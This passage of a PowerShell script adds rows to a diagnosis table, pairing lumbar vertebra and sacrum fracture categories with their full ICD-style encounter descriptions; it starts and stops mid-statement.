$DiagnosisList.Rows.Add("Stable burst fracture of first lumbar vertebra","Stable burst fracture of first lumbar vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of first lumbar vertebra","Stable burst fracture of first lumbar vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of first lumbar vertebra","Stable burst fracture of first lumbar vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of first lumbar vertebra","Unstable burst fracture of first lumbar vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of first lumbar vertebra","Unstable burst fracture of first lumbar vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of first lumbar vertebra","Unstable burst fracture of first lumbar vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of first lumbar vertebra","Unstable burst fracture of first lumbar vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of first lumbar vertebra","Unstable burst fracture of first lumbar vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of first lumbar vertebra","Unstable burst fracture of first lumbar vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of first lumbar vertebra","Other fracture of first lumbar vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of first lumbar vertebra","Other fracture of first lumbar vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of first lumbar vertebra","Other fracture of first lumbar vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of first lumbar vertebra","Other fracture of first lumbar vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of first lumbar vertebra","Other fracture of first lumbar vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of first lumbar vertebra","Other fracture of first lumbar vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of first lumbar vertebra","Unspecified fracture of first lumbar vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of first lumbar vertebra","Unspecified fracture of first lumbar vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of first lumbar vertebra","Unspecified fracture of first lumbar vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of first lumbar vertebra","Unspecified fracture of first lumbar vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of first lumbar vertebra","Unspecified fracture of first lumbar vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of first lumbar vertebra","Unspecified fracture of first lumbar vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of second lumbar vertebra","Wedge compression fracture of second lumbar vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of second lumbar vertebra","Wedge compression fracture of second lumbar vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of second lumbar vertebra","Wedge compression fracture of second lumbar vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of second lumbar vertebra","Wedge compression fracture of second lumbar vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of second lumbar vertebra","Wedge compression fracture of second lumbar vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of second lumbar vertebra","Wedge compression fracture of second lumbar vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of second lumbar vertebra","Stable burst fracture of second lumbar vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of second lumbar vertebra","Stable burst fracture of second lumbar vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of second lumbar vertebra","Stable burst fracture of second lumbar vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of second lumbar vertebra","Stable burst fracture of second lumbar vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of second lumbar vertebra","Stable burst fracture of second lumbar vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of second lumbar vertebra","Stable burst fracture of second lumbar vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of second lumbar vertebra","Unstable burst fracture of second lumbar vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of second lumbar vertebra","Unstable burst fracture of second lumbar vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of second lumbar vertebra","Unstable burst fracture of second lumbar vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of second lumbar vertebra","Unstable burst fracture of second lumbar vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of second lumbar vertebra","Unstable burst fracture of second lumbar vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of second lumbar vertebra","Unstable burst fracture of second lumbar vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of second lumbar vertebra","Other fracture of second lumbar vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of second lumbar vertebra","Other fracture of second lumbar vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of second lumbar vertebra","Other fracture of second lumbar vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of second lumbar vertebra","Other fracture of second lumbar vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of second lumbar vertebra","Other fracture of second lumbar vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of second lumbar vertebra","Other fracture of second lumbar vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of second lumbar vertebra","Unspecified fracture of second lumbar vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of second lumbar vertebra","Unspecified fracture of second lumbar vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of second lumbar vertebra","Unspecified fracture of second lumbar vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of second lumbar vertebra","Unspecified fracture of second lumbar vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of second lumbar vertebra","Unspecified fracture of second lumbar vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of second lumbar vertebra","Unspecified fracture of second lumbar vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of third lumbar vertebra","Wedge compression fracture of third lumbar vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of third lumbar vertebra","Wedge compression fracture of third lumbar vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of third lumbar vertebra","Wedge compression fracture of third lumbar vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of third lumbar vertebra","Wedge compression fracture of third lumbar vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of third lumbar vertebra","Wedge compression fracture of third lumbar vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of third lumbar vertebra","Wedge compression fracture of third lumbar vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of third lumbar vertebra","Stable burst fracture of third lumbar vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of third lumbar vertebra","Stable burst fracture of third lumbar vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of third lumbar vertebra","Stable burst fracture of third lumbar vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of third lumbar vertebra","Stable burst fracture of third lumbar vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of third lumbar vertebra","Stable burst fracture of third lumbar vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of third lumbar vertebra","Stable burst fracture of third lumbar vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of third lumbar vertebra","Unstable burst fracture of third lumbar vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of third lumbar vertebra","Unstable burst fracture of third lumbar vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of third lumbar vertebra","Unstable burst fracture of third lumbar vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of third lumbar vertebra","Unstable burst fracture of third lumbar vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of third lumbar vertebra","Unstable burst fracture of third lumbar vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of third lumbar vertebra","Unstable burst fracture of third lumbar vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of third lumbar vertebra","Other fracture of third lumbar vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of third lumbar vertebra","Other fracture of third lumbar vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of third lumbar vertebra","Other fracture of third lumbar vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of third lumbar vertebra","Other fracture of third lumbar vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of third lumbar vertebra","Other fracture of third lumbar vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of third lumbar vertebra","Other fracture of third lumbar vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of third lumbar vertebra","Unspecified fracture of third lumbar vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of third lumbar vertebra","Unspecified fracture of third lumbar vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of third lumbar vertebra","Unspecified fracture of third lumbar vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of third lumbar vertebra","Unspecified fracture of third lumbar vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of third lumbar vertebra","Unspecified fracture of third lumbar vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of third lumbar vertebra","Unspecified fracture of third lumbar vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of fourth lumbar vertebra","Wedge compression fracture of fourth lumbar vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of fourth lumbar vertebra","Wedge compression fracture of fourth lumbar vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of fourth lumbar vertebra","Wedge compression fracture of fourth lumbar vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of fourth lumbar vertebra","Wedge compression fracture of fourth lumbar vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of fourth lumbar vertebra","Wedge compression fracture of fourth lumbar vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of fourth lumbar vertebra","Wedge compression fracture of fourth lumbar vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of fourth lumbar vertebra","Stable burst fracture of fourth lumbar vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of fourth lumbar vertebra","Stable burst fracture of fourth lumbar vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of fourth lumbar vertebra","Stable burst fracture of fourth lumbar vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of fourth lumbar vertebra","Stable burst fracture of fourth lumbar vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of fourth lumbar vertebra","Stable burst fracture of fourth lumbar vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of fourth lumbar vertebra","Stable burst fracture of fourth lumbar vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of fourth lumbar vertebra","Unstable burst fracture of fourth lumbar vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of fourth lumbar vertebra","Unstable burst fracture of fourth lumbar vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of fourth lumbar vertebra","Unstable burst fracture of fourth lumbar vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of fourth lumbar vertebra","Unstable burst fracture of fourth lumbar vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of fourth lumbar vertebra","Unstable burst fracture of fourth lumbar vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of fourth lumbar vertebra","Unstable burst fracture of fourth lumbar vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of fourth lumbar vertebra","Other fracture of fourth lumbar vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of fourth lumbar vertebra","Other fracture of fourth lumbar vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of fourth lumbar vertebra","Other fracture of fourth lumbar vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of fourth lumbar vertebra","Other fracture of fourth lumbar vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of fourth lumbar vertebra","Other fracture of fourth lumbar vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of fourth lumbar vertebra","Other fracture of fourth lumbar vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of fourth lumbar vertebra","Unspecified fracture of fourth lumbar vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of fourth lumbar vertebra","Unspecified fracture of fourth lumbar vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of fourth lumbar vertebra","Unspecified fracture of fourth lumbar vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of fourth lumbar vertebra","Unspecified fracture of fourth lumbar vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of fourth lumbar vertebra","Unspecified fracture of fourth lumbar vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of fourth lumbar vertebra","Unspecified fracture of fourth lumbar vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of fifth lumbar vertebra","Wedge compression fracture of fifth lumbar vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of fifth lumbar vertebra","Wedge compression fracture of fifth lumbar vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of fifth lumbar vertebra","Wedge compression fracture of fifth lumbar vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of fifth lumbar vertebra","Wedge compression fracture of fifth lumbar vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of fifth lumbar vertebra","Wedge compression fracture of fifth lumbar vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Wedge compression fracture of fifth lumbar vertebra","Wedge compression fracture of fifth lumbar vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of fifth lumbar vertebra","Stable burst fracture of fifth lumbar vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of fifth lumbar vertebra","Stable burst fracture of fifth lumbar vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of fifth lumbar vertebra","Stable burst fracture of fifth lumbar vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of fifth lumbar vertebra","Stable burst fracture of fifth lumbar vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of fifth lumbar vertebra","Stable burst fracture of fifth lumbar vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Stable burst fracture of fifth lumbar vertebra","Stable burst fracture of fifth lumbar vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of fifth lumbar vertebra","Unstable burst fracture of fifth lumbar vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of fifth lumbar vertebra","Unstable burst fracture of fifth lumbar vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of fifth lumbar vertebra","Unstable burst fracture of fifth lumbar vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of fifth lumbar vertebra","Unstable burst fracture of fifth lumbar vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of fifth lumbar vertebra","Unstable burst fracture of fifth lumbar vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unstable burst fracture of fifth lumbar vertebra","Unstable burst fracture of fifth lumbar vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of fifth lumbar vertebra","Other fracture of fifth lumbar vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of fifth lumbar vertebra","Other fracture of fifth lumbar vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of fifth lumbar vertebra","Other fracture of fifth lumbar vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of fifth lumbar vertebra","Other fracture of fifth lumbar vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of fifth lumbar vertebra","Other fracture of fifth lumbar vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of fifth lumbar vertebra","Other fracture of fifth lumbar vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of fifth lumbar vertebra","Unspecified fracture of fifth lumbar vertebra, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of fifth lumbar vertebra","Unspecified fracture of fifth lumbar vertebra, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of fifth lumbar vertebra","Unspecified fracture of fifth lumbar vertebra, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of fifth lumbar vertebra","Unspecified fracture of fifth lumbar vertebra, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of fifth lumbar vertebra","Unspecified fracture of fifth lumbar vertebra, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of fifth lumbar vertebra","Unspecified fracture of fifth lumbar vertebra, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of sacrum","Unspecified fracture of sacrum, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of sacrum","Unspecified fracture of sacrum, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of sacrum","Unspecified fracture of sacrum, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of sacrum","Unspecified fracture of sacrum, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of sacrum","Unspecified fracture of sacrum, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of sacrum","Unspecified fracture of sacrum, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced Zone I fracture of sacrum","Nondisplaced Zone I fracture of sacrum, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced Zone I fracture of sacrum","Nondisplaced Zone I fracture of sacrum, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced Zone I fracture of sacrum","Nondisplaced Zone I fracture of sacrum, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced Zone I fracture of sacrum","Nondisplaced Zone I fracture of sacrum, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced Zone I fracture of sacrum","Nondisplaced Zone I fracture of sacrum, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced Zone I fracture of sacrum","Nondisplaced Zone I fracture of sacrum, sequela") + $null = $DiagnosisList.Rows.Add("Minimally displaced Zone I fracture of sacrum","Minimally displaced Zone I fracture of sacrum, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Minimally displaced Zone I fracture of sacrum","Minimally displaced Zone I fracture of sacrum, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Minimally displaced Zone I fracture of sacrum","Minimally displaced Zone I fracture of sacrum, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Minimally displaced Zone I fracture of sacrum","Minimally displaced Zone I fracture of sacrum, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Minimally displaced Zone I fracture of sacrum","Minimally displaced Zone I fracture of sacrum, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Minimally displaced Zone I fracture of sacrum","Minimally displaced Zone I fracture of sacrum, sequela") + $null = $DiagnosisList.Rows.Add("Severely displaced Zone I fracture of sacrum","Severely displaced Zone I fracture of sacrum, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Severely displaced Zone I fracture of sacrum","Severely displaced Zone I fracture of sacrum, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Severely displaced Zone I fracture of sacrum","Severely displaced Zone I fracture of sacrum, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Severely displaced Zone I fracture of sacrum","Severely displaced Zone I fracture of sacrum, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Severely displaced Zone I fracture of sacrum","Severely displaced Zone I fracture of sacrum, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Severely displaced Zone I fracture of sacrum","Severely displaced Zone I fracture of sacrum, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified Zone I fracture of sacrum","Unspecified Zone I fracture of sacrum, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified Zone I fracture of sacrum","Unspecified Zone I fracture of sacrum, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified Zone I fracture of sacrum","Unspecified Zone I fracture of sacrum, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified Zone I fracture of sacrum","Unspecified Zone I fracture of sacrum, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified Zone I fracture of sacrum","Unspecified Zone I fracture of sacrum, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified Zone I fracture of sacrum","Unspecified Zone I fracture of sacrum, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced Zone II fracture of sacrum","Nondisplaced Zone II fracture of sacrum, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced Zone II fracture of sacrum","Nondisplaced Zone II fracture of sacrum, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced Zone II fracture of sacrum","Nondisplaced Zone II fracture of sacrum, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced Zone II fracture of sacrum","Nondisplaced Zone II fracture of sacrum, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced Zone II fracture of sacrum","Nondisplaced Zone II fracture of sacrum, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced Zone II fracture of sacrum","Nondisplaced Zone II fracture of sacrum, sequela") + $null = $DiagnosisList.Rows.Add("Minimally displaced Zone II fracture of sacrum","Minimally displaced Zone II fracture of sacrum, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Minimally displaced Zone II fracture of sacrum","Minimally displaced Zone II fracture of sacrum, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Minimally displaced Zone II fracture of sacrum","Minimally displaced Zone II fracture of sacrum, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Minimally displaced Zone II fracture of sacrum","Minimally displaced Zone II fracture of sacrum, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Minimally displaced Zone II fracture of sacrum","Minimally displaced Zone II fracture of sacrum, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Minimally displaced Zone II fracture of sacrum","Minimally displaced Zone II fracture of sacrum, sequela") + $null = $DiagnosisList.Rows.Add("Severely displaced Zone II fracture of sacrum","Severely displaced Zone II fracture of sacrum, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Severely displaced Zone II fracture of sacrum","Severely displaced Zone II fracture of sacrum, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Severely displaced Zone II fracture of sacrum","Severely displaced Zone II fracture of sacrum, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Severely displaced Zone II fracture of sacrum","Severely displaced Zone II fracture of sacrum, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Severely displaced Zone II fracture of sacrum","Severely displaced Zone II fracture of sacrum, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Severely displaced Zone II fracture of sacrum","Severely displaced Zone II fracture of sacrum, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified Zone II fracture of sacrum","Unspecified Zone II fracture of sacrum, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified Zone II fracture of sacrum","Unspecified Zone II fracture of sacrum, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified Zone II fracture of sacrum","Unspecified Zone II fracture of sacrum, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified Zone II fracture of sacrum","Unspecified Zone II fracture of sacrum, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified Zone II fracture of sacrum","Unspecified Zone II fracture of sacrum, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified Zone II fracture of sacrum","Unspecified Zone II fracture of sacrum, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced Zone III fracture of sacrum","Nondisplaced Zone III fracture of sacrum, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced Zone III fracture of sacrum","Nondisplaced Zone III fracture of sacrum, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced Zone III fracture of sacrum","Nondisplaced Zone III fracture of sacrum, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced Zone III fracture of sacrum","Nondisplaced Zone III fracture of sacrum, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced Zone III fracture of sacrum","Nondisplaced Zone III fracture of sacrum, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced Zone III fracture of sacrum","Nondisplaced Zone III fracture of sacrum, sequela") + $null = $DiagnosisList.Rows.Add("Minimally displaced Zone III fracture of sacrum","Minimally displaced Zone III fracture of sacrum, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Minimally displaced Zone III fracture of sacrum","Minimally displaced Zone III fracture of sacrum, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Minimally displaced Zone III fracture of sacrum","Minimally displaced Zone III fracture of sacrum, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Minimally displaced Zone III fracture of sacrum","Minimally displaced Zone III fracture of sacrum, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Minimally displaced Zone III fracture of sacrum","Minimally displaced Zone III fracture of sacrum, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Minimally displaced Zone III fracture of sacrum","Minimally displaced Zone III fracture of sacrum, sequela") + $null = $DiagnosisList.Rows.Add("Severely displaced Zone III fracture of sacrum","Severely displaced Zone III fracture of sacrum, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Severely displaced Zone III fracture of sacrum","Severely displaced 